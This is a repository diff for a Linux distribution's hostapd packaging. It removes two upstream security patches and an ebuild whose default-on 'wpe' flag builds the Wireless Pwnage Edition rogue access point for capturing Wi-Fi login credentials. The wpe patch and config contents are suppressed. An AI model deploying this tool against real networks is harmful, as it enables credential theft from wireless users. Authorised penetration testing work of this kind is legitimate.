+ event_addr_failure(e);
return -1;
}
@@ -302,7 +302,7 @@ static int event_send_start(struct subscription *s)
event_http_cb, e);
if (e->http_event == NULL) {
wpabuf_free(buf);
- event_retry(e, 0);
+ event_addr_failure(e);
return -1;
}
--
2.20.1

73
net-wireless/hostapd/files/hostapd-2.9-AP-Silently-ignore-management-frame-from-unexpected.patch
View file

@ -1,73 +0,0 @@
From 8c07fa9eda13e835f3f968b2e1c9a8be3a851ff9 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Thu, 29 Aug 2019 11:52:04 +0300
Subject: [PATCH] AP: Silently ignore management frame from unexpected source
address
Do not process any received Management frames with unexpected/invalid SA
so that we do not add any state for unexpected STA addresses or end up
sending out frames to unexpected destination. This prevents unexpected
sequences where an unprotected frame might end up causing the AP to send
out a response to another device and that other device processing the
unexpected response.
In particular, this prevents some potential denial of service cases
where the unexpected response frame from the AP might result in a
connected station dropping its association.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/ap/drv_callbacks.c | 13 +++++++++++++
src/ap/ieee802_11.c | 12 ++++++++++++
2 files changed, 25 insertions(+)
diff --git a/src/ap/drv_callbacks.c b/src/ap/drv_callbacks.c
index 31587685fe3b..34ca379edc3d 100644
--- a/src/ap/drv_callbacks.c
+++ b/src/ap/drv_callbacks.c
@@ -131,6 +131,19 @@ int hostapd_notif_assoc(struct hostapd_data *hapd, const u8 *addr,
"hostapd_notif_assoc: Skip event with no address");
return -1;
}
+
+ if (is_multicast_ether_addr(addr) ||
+ is_zero_ether_addr(addr) ||
+ os_memcmp(addr, hapd->own_addr, ETH_ALEN) == 0) {
+ /* Do not process any frames with unexpected/invalid SA so that
+ * we do not add any state for unexpected STA addresses or end
+ * up sending out frames to unexpected destination. */
+ wpa_printf(MSG_DEBUG, "%s: Invalid SA=" MACSTR
+ " in received indication - ignore this indication silently",
+ __func__, MAC2STR(addr));
+ return 0;
+ }
+
random_add_randomness(addr, ETH_ALEN);
hostapd_logger(hapd, addr, HOSTAPD_MODULE_IEEE80211,
diff --git a/src/ap/ieee802_11.c b/src/ap/ieee802_11.c
index c85a28db44b7..e7065372e158 100644
--- a/src/ap/ieee802_11.c
+++ b/src/ap/ieee802_11.c
@@ -4626,6 +4626,18 @@ int ieee802_11_mgmt(struct hostapd_data *hapd, const u8 *buf, size_t len,
fc = le_to_host16(mgmt->frame_control);
stype = WLAN_FC_GET_STYPE(fc);
+ if (is_multicast_ether_addr(mgmt->sa) ||
+ is_zero_ether_addr(mgmt->sa) ||
+ os_memcmp(mgmt->sa, hapd->own_addr, ETH_ALEN) == 0) {
+ /* Do not process any frames with unexpected/invalid SA so that
+ * we do not add any state for unexpected STA addresses or end
+ * up sending out frames to unexpected destination. */
+ wpa_printf(MSG_DEBUG, "MGMT: Invalid SA=" MACSTR
+ " in received frame - ignore this frame silently",
+ MAC2STR(mgmt->sa));
+ return 0;
+ }
+
if (stype == WLAN_FC_STYPE_BEACON) {
handle_beacon(hapd, mgmt, len, fi);
return 1;
--
2.20.1

115
net-wireless/hostapd/files/hostapd-2.9-ASN-1-Validate-DigestAlgorithmIdentifier-parameters.patch
View file

@ -1,115 +0,0 @@
From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sat, 13 Mar 2021 18:19:31 +0200
Subject: ASN.1: Validate DigestAlgorithmIdentifier parameters
The supported hash algorithms do not use AlgorithmIdentifier parameters.
However, there are implementations that include NULL parameters in
addition to ones that omit the parameters. Previous implementation did
not check the parameters value at all which supported both these cases,
but did not reject any other unexpected information.
Use strict validation of digest algorithm parameters and reject any
unexpected value when validating a signature. This is needed to prevent
potential forging attacks.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/tls/pkcs1.c | 21 +++++++++++++++++++++
src/tls/x509v3.c | 20 ++++++++++++++++++++
2 files changed, 41 insertions(+)
diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
index bbdb0d7..5761dfe 100644
--- a/src/tls/pkcs1.c
+++ b/src/tls/pkcs1.c
@@ -244,6 +244,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
os_free(decrypted);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
+ hdr.payload, hdr.length);
pos = hdr.payload;
end = pos + hdr.length;
@@ -265,6 +267,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
os_free(decrypted);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
+ hdr.payload, hdr.length);
da_end = hdr.payload + hdr.length;
if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
@@ -273,6 +277,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
os_free(decrypted);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
+ next, da_end - next);
+
+ /*
+ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
+ * omit the parameters, but there are implementation that encode these
+ * as a NULL element. Allow these two cases and reject anything else.
+ */
+ if (da_end > next &&
+ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
+ !asn1_is_null(&hdr) ||
+ hdr.payload + hdr.length != da_end)) {
+ wpa_printf(MSG_DEBUG,
+ "PKCS #1: Unexpected digest algorithm parameters");
+ os_free(decrypted);
+ return -1;
+ }
if (!asn1_oid_equal(&oid, hash_alg)) {
char txt[100], txt2[100];
diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
index a8944dd..df337ec 100644
--- a/src/tls/x509v3.c
+++ b/src/tls/x509v3.c
@@ -1964,6 +1964,7 @@ int x509_check_signature(struct x509_certificate *issuer,
os_free(data);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
pos = hdr.payload;
end = pos + hdr.length;
@@ -1985,6 +1986,8 @@ int x509_check_signature(struct x509_certificate *issuer,
os_free(data);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
+ hdr.payload, hdr.length);
da_end = hdr.payload + hdr.length;
if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
@@ -1992,6 +1995,23 @@ int x509_check_signature(struct x509_certificate *issuer,
os_free(data);
return -1;
}
+ wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
+ next, da_end - next);
+
+ /*
+ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
+ * omit the parameters, but there are implementation that encode these
+ * as a NULL element. Allow these two cases and reject anything else.
+ */
+ if (da_end > next &&
+ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
+ !asn1_is_null(&hdr) ||
+ hdr.payload + hdr.length != da_end)) {
+ wpa_printf(MSG_DEBUG,
+ "X509: Unexpected digest algorithm parameters");
+ os_free(data);
+ return -1;
+ }
if (x509_sha1_oid(&oid)) {
if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
--
cgit v0.12

2042
net-wireless/hostapd/files/hostapd-2.9-wpe.conf
View file

File diff suppressed because it is too large Load diff

4194
net-wireless/hostapd/files/hostapd-2.9-wpe.patch
View file

File diff suppressed because it is too large Load diff

275
net-wireless/hostapd/hostapd-2.10-r2.ebuild
View file

@ -1,275 +0,0 @@
# Copyright 1999-2022 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
inherit flag-o-matic systemd savedconfig toolchain-funcs
EXTRAS_VER="2.7-r2"
EXTRAS_NAME="${CATEGORY}_${PN}_${EXTRAS_VER}_extras"
DESCRIPTION="IEEE 802.11 wireless LAN Host AP daemon"
HOMEPAGE="https://w1.fi/ https://w1.fi/cgit/hostap/ https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe"
SRC_URI="https://dev.gentoo.org/~andrey_utkin/distfiles/${EXTRAS_NAME}.tar.xz"
S="${S}/${PN}"
if [[ ${PV} == 9999 ]]; then
inherit git-r3
EGIT_REPO_URI="https://w1.fi/hostap.git"
else
if [[ ${PV} =~ ^.*_p[0-9]{8}$ ]]; then
SRC_URI+=" https://dev.gentoo.org/~andrey_utkin/distfiles/${P}.tar.xz"
else
SRC_URI+=" https://w1.fi/releases/${P}.tar.gz"
fi
# Never stabilize snapshot ebuilds please
KEYWORDS="amd64 arm arm64 ~mips ppc x86"
fi
LICENSE="BSD"
SLOT="0"
IUSE="internal-tls ipv6 netlink sqlite +suiteb +wpe +wps"
DEPEND="
internal-tls? ( dev-libs/libtommath )
!internal-tls? ( dev-libs/openssl:0=[-bindist(-)] )
kernel_linux? (
net-wireless/wireless-regdb
>=dev-libs/libnl-3.2:3
)
netlink? ( net-libs/libnfnetlink )
sqlite? ( dev-db/sqlite:3 )"
RDEPEND="${DEPEND}"
BDEPEND="virtual/pkgconfig"
pkg_pretend() {
if use internal-tls; then
ewarn "internal-tls implementation is experimental and provides fewer features"
fi
}
src_unpack() {
# Override default one because we need the SRC_URI ones even in case of 9999 ebuilds
default
if [[ ${PV} == 9999 ]] ; then
git-r3_src_unpack
fi
}
src_prepare() {
# Allow users to apply patches to src/drivers for example,
# i.e. anything outside ${S}/${PN}
pushd ../ >/dev/null || die
default
#https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe
use wpe && eapply "${FILESDIR}/${P}-wpe.patch"
popd >/dev/null || die
sed -i -e "s:/etc/hostapd:/etc/hostapd/hostapd:g" \
"${S}/hostapd.conf" || die
}
src_configure() {
local CONFIG="${S}"/.config
restore_config "${CONFIG}"
if [[ -f "${CONFIG}" ]]; then
default
return 0
fi
# toolchain setup
echo "CC = $(tc-getCC)" > ${CONFIG} || die
# EAP authentication methods
echo "CONFIG_EAP=y" >> ${CONFIG} || die
echo "CONFIG_ERP=y" >> ${CONFIG} || die
echo "CONFIG_EAP_MD5=y" >> ${CONFIG} || die
if use suiteb; then
echo "CONFIG_SUITEB=y" >> ${CONFIG} || die
echo "CONFIG_SUITEB192=y" >> ${CONFIG} || die
fi
if use internal-tls ; then
echo "CONFIG_TLS=internal" >> ${CONFIG} || die
else
# SSL authentication methods
echo "CONFIG_DPP=y" >> ${CONFIG} || die
echo "CONFIG_EAP_FAST=y" >> ${CONFIG} || die
echo "CONFIG_EAP_MSCHAPV2=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PEAP=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PWD=y" >> ${CONFIG} || die
echo "CONFIG_EAP_TLS=y" >> ${CONFIG} || die
echo "CONFIG_EAP_TTLS=y" >> ${CONFIG} || die
echo "CONFIG_OWE=y" >> ${CONFIG} || die
echo "CONFIG_SAE=y" >> ${CONFIG} || die
echo "CONFIG_TLSV11=y" >> ${CONFIG} || die
echo "CONFIG_TLSV12=y" >> ${CONFIG} || die
fi
if use wps; then
# Enable Wi-Fi Protected Setup
echo "CONFIG_WPS=y" >> ${CONFIG} || die
echo "CONFIG_WPS2=y" >> ${CONFIG} || die
echo "CONFIG_WPS_UPNP=y" >> ${CONFIG} || die
echo "CONFIG_WPS_NFC=y" >> ${CONFIG} || die
einfo "Enabling Wi-Fi Protected Setup support"
fi
echo "CONFIG_EAP_IKEV2=y" >> ${CONFIG} || die
echo "CONFIG_EAP_TNC=y" >> ${CONFIG} || die
echo "CONFIG_EAP_GTC=y" >> ${CONFIG} || die
echo "CONFIG_EAP_SIM=y" >> ${CONFIG} || die
echo "CONFIG_EAP_AKA=y" >> ${CONFIG} || die
echo "CONFIG_EAP_AKA_PRIME=y" >> ${CONFIG} || die
echo "CONFIG_EAP_EKE=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PAX=y" >> ${CONFIG} || die
echo "CONFIG_EAP_PSK=y" >> ${CONFIG} || die
echo "CONFIG_EAP_SAKE=y" >> ${CONFIG} || die
echo "CONFIG_EAP_GPSK=y" >> ${CONFIG} || die
echo "CONFIG_EAP_GPSK_SHA256=y" >> ${CONFIG} || die
einfo "Enabling drivers: "
# drivers
echo "CONFIG_DRIVER_HOSTAP=y" >> ${CONFIG} || die
einfo " HostAP driver enabled"
echo "CONFIG_DRIVER_WIRED=y" >> ${CONFIG} || die
einfo " Wired driver enabled"
echo "CONFIG_DRIVER_NONE=y" >> ${CONFIG} || die
einfo " None driver enabled"
einfo " nl80211 driver enabled"
echo "CONFIG_DRIVER_NL80211=y" >> ${CONFIG} || die
# epoll
echo "CONFIG_ELOOP_EPOLL=y" >> ${CONFIG} || die
# misc
echo "CONFIG_DEBUG_FILE=y" >> ${CONFIG} || die
echo "CONFIG_PKCS12=y" >> ${CONFIG} || die
echo "CONFIG_RADIUS_SERVER=y" >> ${CONFIG} || die
echo "CONFIG_IAPP=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211R=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211W=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211N=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211AC=y" >> ${CONFIG} || die
echo "CONFIG_IEEE80211AX=y" >> ${CONFIG} || die
echo "CONFIG_OCV=y" >> ${CONFIG} || die
echo "CONFIG_PEERKEY=y" >> ${CONFIG} || die
echo "CONFIG_RSN_PREAUTH=y" >> ${CONFIG} || die
echo "CONFIG_INTERWORKING=y" >> ${CONFIG} || die
echo "CONFIG_FULL_DYNAMIC_VLAN=y" >> ${CONFIG} || die
echo "CONFIG_HS20=y" >> ${CONFIG} || die
echo "CONFIG_WNM=y" >> ${CONFIG} || die
echo "CONFIG_FST=y" >> ${CONFIG} || die
echo "CONFIG_FST_TEST=y" >> ${CONFIG} || die
echo "CONFIG_ACS=y" >> ${CONFIG} || die
if use netlink; then
# Netlink support
echo "CONFIG_VLAN_NETLINK=y" >> ${CONFIG} || die
fi
if use ipv6; then
# IPv6 support
echo "CONFIG_IPV6=y" >> ${CONFIG} || die
fi
if use sqlite; then
# Sqlite support
echo "CONFIG_SQLITE=y" >> ${CONFIG} || die
fi
if use kernel_linux; then
echo "CONFIG_LIBNL32=y" >> ${CONFIG} || die
append-cflags $($(tc-getPKG_CONFIG) --cflags libnl-3.0)
fi
# TODO: Add support for BSD drivers
default
}
src_compile() {
emake V=1
if ! use internal-tls; then
emake V=1 nt_password_hash
emake V=1 hlr_auc_gw
fi
}
src_install() {
insinto /etc/${PN}
doins ${PN}.{conf,accept,deny,eap_user,radius_clients,sim_db,wpa_psk}
use wpe && doins "${FILESDIR}"/hostapd-int.conf "${FILESDIR}"/hostapd-ext.conf "${FILESDIR}/${P}"-wpe.conf
fperms -R 600 /etc/${PN}
if use wpe; then
newsbin ${PN} ${PN}-wpe
newbin ${PN}_cli ${PN}_cli-wpe
dosym ./${PN}-wpe /usr/sbin/${PN}
DESTDIR="${ED}" emake wpe
else
dosbin ${PN}
dobin ${PN}_cli
fi
if ! use internal-tls; then
dobin nt_password_hash hlr_auc_gw
fi
newinitd "${WORKDIR}/${EXTRAS_NAME}"/${PN}-init.d ${PN}
newconfd "${WORKDIR}/${EXTRAS_NAME}"/${PN}-conf.d ${PN}
systemd_dounit "${WORKDIR}/${EXTRAS_NAME}"/${PN}.service
doman ${PN}{.8,_cli.1}
dodoc ChangeLog README
use wps && dodoc README-WPS
docinto examples
dodoc wired.conf
insinto /etc/log.d/conf/services/
doins logwatch/${PN}.conf
exeinto /etc/log.d/scripts/services/
doexe logwatch/${PN}
save_config .config
}
pkg_postinst() {
einfo
einfo "If you are running OpenRC you need to follow this instructions:"
einfo "In order to use ${PN} you need to set up your wireless card"
einfo "for master mode in /etc/conf.d/net and then start"
einfo "/etc/init.d/${PN}."
einfo
einfo "Example configuration:"
einfo
einfo "config_wlan0=( \"192.168.1.1/24\" )"
einfo "channel_wlan0=\"6\""
einfo "essid_wlan0=\"test\""
einfo "mode_wlan0=\"master\""
einfo
#if [[ -e "${KV_DIR}"/net/mac80211 ]]; then
# einfo "This package now compiles against the headers installed by"
# einfo "the kernel source for the mac80211 driver. You should "
# einfo "re-emerge ${PN} after upgrading your kernel source."
#fi
if use wps; then
einfo "You have enabled Wi-Fi Protected Setup support, please"
einfo "read the README-WPS file in /usr/share/doc/${PF}"
einfo "for info on how to use WPS"
fi
}

16
net-wireless/hostapd/metadata.xml
View file

@ -7,20 +7,18 @@
RADIUS Authentication client, RADIUS Accounting client
</longdescription>
<use>
<flag name="crda">Add CRDA support</flag>
<flag name="internal-tls">Use internal TLSv1 implementation instead of depending on OpenSSL, LibreSSL or GnuTLS</flag>
<flag name="logwatch">Install support files for
<pkg>sys-apps/logwatch</pkg></flag>
<flag name="netlink">Adding support for using netlink to create VLANs</flag>
<flag name="sqlite">Adding sqlite support</flag>
<flag name="suiteb">Enable CNSA/Suiteb cipher support</flag>
<flag name="wpe">Add support for Wireless Pwnage Edition patches</flag>
<flag name="wps">Add support for Wi-Fi Protected Setup</flag>
</use>
<maintainer type="person">
<email>andrey_utkin@gentoo.org</email>
<name>Andrey Utkin</name>
</maintainer>
<maintainer type="person">
<email>zerochaos@gentoo.org</email>
<name>Rick Farina</name>
<email>sidhayn@gmail.com</email>
<name>Zero_Chaos</name>
</maintainer>
<upstream>
<remote-id type="github">aircrack-ng/aircrack-ng</remote-id>
</upstream>
</pkgmetadata>